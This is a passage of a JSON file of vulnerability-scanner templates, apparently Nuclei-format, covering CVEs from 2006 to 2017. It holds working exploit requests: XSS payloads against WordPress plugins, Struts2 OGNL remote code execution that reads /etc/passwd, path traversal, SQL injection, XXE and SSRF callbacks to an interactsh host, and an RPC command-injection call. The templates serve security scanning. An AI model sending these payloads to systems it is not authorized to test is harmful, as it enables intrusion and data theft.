200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pinterest by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18516","info":{"name":"LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"LinkedIn by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18565","info":{"name":"Updater by BestWebSoft < 1.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/updater/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Updater by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18530","info":{"name":"Rating by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Rating by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/emag-marketplace-connector/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18564","info":{"name":"Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/sender/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Sender by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Mailster ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18532","info":{"name":"Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/realty/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Realty by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Raygun4WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-18537","info":{"name":"Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Visitors Online by\")"],"condition":"and"}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Skysa App"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/alert-before-your-post/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Featurific For Wordpress"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Adminimize ==="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-4640","info":{"name":"WebTitan < 3.60 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login-x.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login-x.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\njaction=login&language=en_US&username={{username}}&password={{password}}\n","GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"success\\\":true\")","contains(body_1, \"WebTitan\")","regex('root:.*:0:0:', body)","status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Grand Flagallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET 